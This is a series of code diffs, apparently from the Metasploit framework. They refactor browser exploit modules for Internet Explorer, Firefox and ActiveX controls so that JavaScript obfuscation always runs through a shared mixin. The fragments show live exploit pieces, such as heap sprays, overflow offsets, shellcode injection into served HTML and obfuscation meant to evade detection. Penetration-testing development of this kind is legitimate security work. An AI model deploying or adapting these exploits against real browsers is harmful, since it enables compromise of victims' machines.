--- a/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
+++ b/modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
@@ -64,12 +64,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Jul 24 2013",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   # Just reminding the user to delete LrWeb2MdrvLoader.dll

--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -343,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #{objects}
     <script>
     CollectGarbage();
-    #{js.to_s}
+    #{js}
     #{target_object}.Caption = "";
     #{target_object}.TabCaption(0) = "#{buf}";
     </script>

--- a/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
+++ b/modules/exploits/windows/browser/ibm_spss_c1sizer.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -94,11 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => "Apr 26 2013",
       'DefaultTarget'  => 0))
 
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -151,11 +148,7 @@ class Metasploit3 < Msf::Exploit::Remote
     |
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -350,7 +343,7 @@ class Metasploit3 < Msf::Exploit::Remote
     #{objects}
     <script>
     CollectGarbage();
-    #{js}
+    #{js.to_s}
     #{target_object}.Caption = "";
     #{target_object}.TabCaption(0) = "#{buf}";
     </script>

--- a/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
+++ b/modules/exploits/windows/browser/ibm_tivoli_pme_activex_bof.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -99,11 +101,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Mar 01 2012",
       'DefaultTarget'  => 0))
-
-      register_options(
-        [
-          OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-        ], self.class)
   end
 
   def get_target(agent)
@@ -204,11 +201,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js_spray = heaplib(js_spray, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js_spray = ::Rex::Exploitation::JSObfu.new(js_spray)
-      js_spray.obfuscate
-    end
+    js_spray = js_obfuscate(js_spray)
 
     bof = rand_text_alpha(my_target['Offset'])
     bof << [my_target['ebp']].pack("V") # ebp
@@ -218,7 +211,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-      #{js_spray}
+      #{js_spray.to_s}
     </script>
     </head>
     <object classid='clsid:84B74E82-3475-420E-9949-773B4FB91771' id='isig'></object>
@@ -230,8 +223,6 @@ class Metasploit3 < Msf::Exploit::Remote
     </script>
     </html>
     HTML
-
-    html = html.gsub(/^ {4}/, '')
 
     print_status("Sending html")
     send_response(cli, html, {'Content-Type'=>'text/html'})

--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -219,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote
     </meta>
 
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
 

--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -209,6 +209,8 @@ class Metasploit3 < Msf::Exploit::Remote
     }
     |
 
+    js = js_obfuscate(js)
+
     html = %Q|<!doctype html>
     <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
     <head>

--- a/modules/exploits/windows/browser/ie_cbutton_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cbutton_uaf.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #autopwn_info({
   #  :ua_name    => HttpClients::IE,
@@ -78,12 +80,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Dec 27 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -176,14 +172,7 @@ class Metasploit3 < Msf::Exploit::Remote
     padding    = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
     js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
 
-    html = %Q|<!doctype html>
-    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
-    <head>
-    <meta>
-      <?IMPORT namespace="t" implementation="#default#time2">
-    </meta>
-
-    <script>
+    js = %Q|
     #{js_mstime_malloc}
 
 
@@ -218,10 +207,21 @@ class Metasploit3 < Msf::Exploit::Remote
 
       mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:"myanim"});
     }
+    |
+
+    html = %Q|<!doctype html>
+    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
+    <head>
+    <meta>
+      <?IMPORT namespace="t" implementation="#default#time2">
+    </meta>
+
+    <script>
+    #{js.to_s}
     </script>
     </head>
 
-    <body onload="eval(helloWorld())">
+    <body onload="eval(#{js.sym('helloWorld')}())">
     <t:ANIMATECOLOR id="myanim"/>
     <div id="divelm"></div>
     <form id="formelm">

--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
@@ -11,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
   include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::JSObfu
+
   autopwn_info({
     :ua_name    => HttpClients::IE,
     :ua_minver  => "8.0",
@@ -72,12 +75,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "May 3 2013",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -158,15 +155,7 @@ class Metasploit3 < Msf::Exploit::Remote
     padding    = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
     js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
 
-
-    html = %Q|
-    <!doctype html>
-    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
-    <head>
-    <meta>
-      <?IMPORT namespace="t" implementation="#default#time2">
-    </meta>
-    <script>
+    js = %Q|
     #{js_mstime_malloc}
 
     function helloWorld()
@@ -203,9 +192,22 @@ class Metasploit3 < Msf::Exploit::Remote
       f0.appendChild(document.createElement('hr'));
       mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
     }
+    |
+
+    js = js_obfuscate(js)
+
+    html = %Q|
+    <!doctype html>
+    <HTML XMLNS:t ="urn:schemas-microsoft-com:time">
+    <head>
+    <meta>
+      <?IMPORT namespace="t" implementation="#default#time2">
+    </meta>
+    <script>
+    #{js.to_s}
     </script>
     </head>
-    <body onload="eval(helloWorld());">
+    <body onload="eval(#{js.sym('helloWorld')}());">
     <t:ANIMATECOLOR id="myanim"/>
     </body>
     </html>
@@ -227,7 +229,6 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     html = load_exploit_html(my_target, cli)
-    html = html.gsub(/^ {4}/, '')
     print_status("Sending HTML...")
     send_response(cli, html, {'Content-Type'=>'text/html'})
   end

--- a/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
+++ b/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb
@@ -204,7 +204,7 @@ class Metasploit3 < Msf::Exploit::Remote
       <?IMPORT namespace="t" implementation="#default#time2">
     </meta>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body onload="eval(#{js.sym('helloWorld')}());">

--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -246,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     html = %Q|
     <html>

--- a/modules/exploits/windows/browser/ie_execcommand_uaf.rb
+++ b/modules/exploits/windows/browser/ie_execcommand_uaf.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking
@@ -11,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
   include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::JSObfu
+
   autopwn_info({
     :ua_name    => HttpClients::IE,
     :ua_minver  => "7.0",
@@ -76,12 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Sep 14 2012",  # When it was spotted in the wild by eromang
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -249,10 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).to_s
 
     html = %Q|
     <html>

--- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info = {})
     super(update_info(info,
@@ -57,9 +59,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Mar 03 2010',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [ OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true]) ], self.class)
   end
 
   # Prevent module from being executed in autopwn
@@ -164,12 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Use heaplib
     js = heaplib(spray)
-
-    # Obfuscate on demand
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).to_s
 
     html = "<html>"
     html << "\n<object classid='clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E' id='#{vname}'></object>"

--- a/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
+++ b/modules/exploits/windows/browser/imgeviewer_tifmergemultifiles.rb
@@ -163,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
     # Use heaplib
     js = heaplib(spray)
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     html = "<html>"
     html << "\n<object classid='clsid:E589DA78-AD4C-4FC5-B6B9-9E47B110679E' id='#{vname}'></object>"

--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -240,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
+++ b/modules/exploits/windows/browser/indusoft_issymbol_internationalseparator.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -74,11 +76,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Apr 28 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
 
   end
 
@@ -177,11 +174,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -247,7 +240,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -237,7 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
+++ b/modules/exploits/windows/browser/inotes_dwa85w_bof.rb
@@ -4,12 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
   #include Msf::Exploit::Remote::BrowserAutopwn
   #
   #autopwn_info({
@@ -79,12 +81,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Jun 01 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -182,11 +178,7 @@ class Metasploit3 < Msf::Exploit::Remote
     end
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js)
 
     return js
   end
@@ -245,7 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
     </script>
     </head>
     <body>

--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = AverageRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info = {})
     super( update_info(info,
@@ -77,11 +79,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => 'Mar 28 2012',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript Obfuscation', true])
-      ], self.class)
   end
 
   def junk
@@ -219,18 +216,15 @@ class Metasploit3 < Msf::Exploit::Remote
       EOF
 
       #JS obfuscation on demand only for IE8
-      if datastore['OBFUSCATE']
-        js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
-        main_sym = js.sym('main')
-      end
+      js = js_obfuscate(js)
+      main_sym = js.sym('main')
 
     end
 
     content = <<-EOF
     <object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='#{obj_name}' ></object>
     <script language='JavaScript' defer>
-    #{js}
+    #{js.to_s}
     </script>
     <body onload="#{main_sym}();">
     <body>

--- a/modules/exploits/windows/browser/intrust_annotatex_add.rb
+++ b/modules/exploits/windows/browser/intrust_annotatex_add.rb
@@ -224,7 +224,7 @@ class Metasploit3 < Msf::Exploit::Remote
     content = <<-EOF
     <object classid='clsid:EF600D71-358F-11D1-8FD4-00AA00BD091C' id='#{obj_name}' ></object>
     <script language='JavaScript' defer>
-    #{js.to_s}
+    #{js}
     </script>
     <body onload="#{main_sym}();">
     <body>

--- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb
+++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
@@ -255,7 +255,7 @@ else {
 }
     |
 
-    custom_js = js_obfuscate(custom_js).to_s
+    custom_js = js_obfuscate(custom_js)
 
     return <<-EOS
 <html>

--- a/modules/exploits/windows/browser/mozilla_interleaved_write.rb
+++ b/modules/exploits/windows/browser/mozilla_interleaved_write.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
@@ -12,6 +13,7 @@ class Metasploit3 < Msf::Exploit::Remote
   # This module acts as an HTTP server
   #
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   #include Msf::Exploit::Remote::BrowserAutopwn
   #autopwn_info({
@@ -71,12 +73,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0,
       'DisclosureDate' => 'Oct 25 2010'
       ))
-
-      register_options(
-        [
-          OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
-        ]
-      )
   end
 
   def on_request_uri(cli, request)
@@ -259,17 +255,7 @@ else {
 }
     |
 
-      if datastore['OBFUSCATE']
-        opts = {
-          'Symbols' => {
-            'Variables' => %w{ atts temp vara varb varc vard vare varf argsu beastk nop tags retaddr
-              ropstr lefthalf bk sunb shellcodes sun8inner sun9inner sun10inner sun11inner array chk },
-            'Methods'   => %w{ getatts code check dedede }
-          }
-        }
-
-        custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts).obfuscate()
-      end
+    custom_js = js_obfuscate(custom_js).to_s
 
     return <<-EOS
 <html>

--- a/modules/exploits/windows/browser/mozilla_nstreerange.rb
+++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb
@@ -4,13 +4,15 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
-
   include Msf::Exploit::Remote::BrowserAutopwn
+  include Msf::Exploit::JSObfu
+
   autopwn_info({
     :ua_name => HttpClients::FF,
     :ua_minver => "3.5",
@@ -120,8 +122,7 @@ class Metasploit3 < Msf::Exploit::Remote
     register_options(
       [
         OptBool.new('SEHProlog', [ true, 'Whether to prepend the payload with an SEH prolog, to catch crashes and enable a silent exit', true]),
-        OptBool.new('CreateThread', [ true, 'Whether to execute the payload in a new thread', true]),
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true]),
+        OptBool.new('CreateThread', [ true, 'Whether to execute the payload in a new thread', true])
       ], self.class
     )
 
@@ -325,17 +326,7 @@ function #{@js_func}() {
   treeSel.invalidateSelection();
 }
 EOS
-
-      if datastore['OBFUSCATE']
-        opts = {
-          'Symbols' => {
-            'Variables' => %w{ shellcode container delimiter block treeSel big pad spray count }
-          }
-        }
-
-        custom_js = obfuscate_js(custom_js,opts)
-      end
-
+      custom_js = js_obfuscate(custom_js).to_s
       send_response(cli, custom_js, { 'Content-Type' => 'application/x-javascript' })
     end
 

--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -219,12 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote
       obj.reduceRight(f,1,2,3);
       JS
 
-      js = js.gsub(/^ {4}/, '')
-
-      if datastore['OBFUSCATE']
-        js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
-      end
+      js = js_obfuscate(js).to_s
 
       html = <<-HTML
       <html>

--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -75,10 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'DefaultTarget'  => 0
     ))
 
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
-      ], self.class)
   end
 
   def junk(n=4)
@@ -308,12 +306,7 @@ class Metasploit3 < Msf::Exploit::Remote
       obj.reduceRight(f,1,2,3);
       JS
 
-      if datastore['OBFUSCATE']
-        js = ::Rex::Exploitation::JSObfu.new(js)
-        js.obfuscate
-      end
-
-      js = js.gsub(/^ {4}/, '')
+      js = js_obfuscate(js)
 
       html = <<-HTML
       <html>
@@ -322,7 +315,7 @@ class Metasploit3 < Msf::Exploit::Remote
       <body>
       <object id="d"><object>
       <script>
-      #{js}
+      #{js.to_s}
       </script>
       </body>
       <html>

--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -219,7 +219,7 @@ class Metasploit3 < Msf::Exploit::Remote
       obj.reduceRight(f,1,2,3);
       JS
 
-      js = js_obfuscate(js).to_s
+      js = js_obfuscate(js)
 
       html = <<-HTML
       <html>

--- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
@@ -4,11 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = GoodRanking # Need more love for Great
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
+
   #include Msf::Exploit::Remote::BrowserAutopwn
   #autopwn_info({
   #  :ua_name    => HttpClients::IE,
@@ -134,11 +137,6 @@ class Metasploit3 < Msf::Exploit::Remote
       # Full-disclosure post was Dec 8th, original blog Nov 29th
       'DisclosureDate' => 'Nov 29 2010',
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', true])
-      ], self.class)
   end
 
 
@@ -270,18 +268,9 @@ vlink.setAttribute("href", "#{placeholder}")
 document.getElementsByTagName("head")[0].appendChild(vlink);
 }
 EOS
-      opts = {
-        'Symbols' => {
-          'Variables' => %w{ heapspray vlink heapblock heap finalspray counter },
-          'Methods'   => %w{ prepare }
-        }
-      }
 
-      if datastore['OBFUSCATE']
-        custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts)
-      end
-
-      js = heaplib(custom_js)
+      js = heaplib(custom_js, {:noobfu => true})
+      js = js_obfuscate(js)
 
       dll_uri = get_resource()
       dll_uri << '/' if dll_uri[-1,1] != '/'

--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -246,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = heaplib(js, {:noobfu => true})
-    js = js_obfuscate(js).to_s
+    js = js_obfuscate(js)
 
     html = <<-HTML
     <html>

--- a/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
+++ b/modules/exploits/windows/browser/ms11_050_mshtml_cobjectelement.rb
@@ -4,12 +4,15 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
+  include Msf::Exploit::JSObfu
+
   #include Msf::Exploit::Remote::BrowserAutopwn
   #autopwn_info({
   #  :ua_name    => HttpClients::IE,
@@ -108,11 +111,6 @@ class Metasploit3 < Msf::Exploit::Remote
         ],
       'DisclosureDate' => "Jun 16 2011",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
   end
 
   def auto_target(cli, request)
@@ -248,11 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-    end
+    js = js_obfuscate(js).to_s
 
     html = <<-HTML
     <html>

--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -4,13 +4,14 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
   include Msf::Exploit::RopDb
-
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -55,11 +56,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Oct 11 2012",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
 
   end
 
@@ -114,12 +110,8 @@ class Metasploit3 < Msf::Exploit::Remote
     |
 
     js = heaplib(js, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js = ::Rex::Exploitation::JSObfu.new(js)
-      js.obfuscate
-      @heap_spray_func = js.sym("heap_spray")
-    end
+    js = js_obfuscate(js)
+    @heap_spray_func = js.sym("heap_spray")
 
     return js
   end
@@ -166,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js}
+    #{js.to_s}
 
     function ivan()
     {

--- a/modules/exploits/windows/browser/ms11_081_option.rb
+++ b/modules/exploits/windows/browser/ms11_081_option.rb
@@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote
     <html>
     <head>
     <script>
-    #{js.to_s}
+    #{js}
 
     function ivan()
     {

--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -4,11 +4,13 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpServer::HTML
+  include Msf::Exploit::JSObfu
 
   def initialize(info={})
     super(update_info(info,
@@ -69,12 +71,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'Privileged'     => false,
       'DisclosureDate' => "Dec 13 2011",
       'DefaultTarget'  => 0))
-
-    register_options(
-      [
-        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
-      ], self.class)
-
   end
 
   def get_target(agent)
@@ -140,11 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js_pivot = heaplib(js_pivot, {:noobfu => true})
-
-    if datastore['OBFUSCATE']
-      js_pivot = ::Rex::Exploitation::JSObfu.new(js_pivot)
-      js_pivot.obfuscate
-    end
+    js_pivot = js_obfuscate(js_pivot).to_s
 
     vsd_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
     vsd_uri << "/#{rand_text_alpha(rand(6)+3)}.vsd"

--- a/modules/exploits/windows/browser/ms11_093_ole32.rb
+++ b/modules/exploits/windows/browser/ms11_093_ole32.rb
@@ -136,7 +136,7 @@ class Metasploit3 < Msf::Exploit::Remote
     JS
 
     js_pivot = heaplib(js_pivot, {:noobfu => true})
-    js_pivot = js_obfuscate(js_pivot).to_s
+    js_pivot = js_obfuscate(js_pivot)
 
     vsd_uri = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
     vsd_uri << "/#{rand_text_alpha(rand(6)+3)}.vsd"

--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@@ -4,6 +4,7 @@
 ##
 
 require 'msf/core'
+require 'msf/core/exploit/jsobfu'
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
@@ -11,6 +12,8 @@ class Metasploit3 < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
